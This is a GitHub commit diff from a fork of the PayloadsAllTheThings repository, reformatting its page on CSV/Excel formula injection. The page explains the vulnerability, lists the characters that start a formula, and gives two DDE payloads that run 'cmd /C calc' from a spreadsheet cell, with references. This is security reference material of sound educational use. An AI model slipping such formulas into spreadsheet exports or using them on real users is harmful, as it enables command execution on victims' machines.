forked from swisskyrepo/PayloadsAllTheThings
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
177c12c
commit 65654f8
Showing
40 changed files
with
1,377 additions
and
829 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,29 +1,32 @@ | ||
# CSV Excel formula injection | ||
|
||
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. | ||
|
||
## Exploit | ||
|
||
Basic exploit with Dynamic Data Exchange | ||
``` | ||
|
||
```powershell | ||
DDE ("cmd";"/C calc";"!A0")A0 | ||
@SUM(1+1)*cmd|' /C calc'!A0 | ||
``` | ||
|
||
Technical Details of the above payload: | ||
cmd is the name the server can respond to whenever a client is trying to access the server | ||
/C calc is the file name which in our case is the calc(i.e the calc.exe) | ||
!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data | ||
|
||
``` | ||
|
||
Any formula can be started with | ||
``` | ||
|
||
```powershell | ||
= | ||
+ | ||
– | ||
@ | ||
``` | ||
|
||
## Thanks to | ||
* https://owasp.org/index.php/CSV_Excel_Macro_Injection | ||
* https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection | ||
*https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/ | ||
|
||
* [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) | ||
* [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) | ||
* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) |
Oops, something went wrong.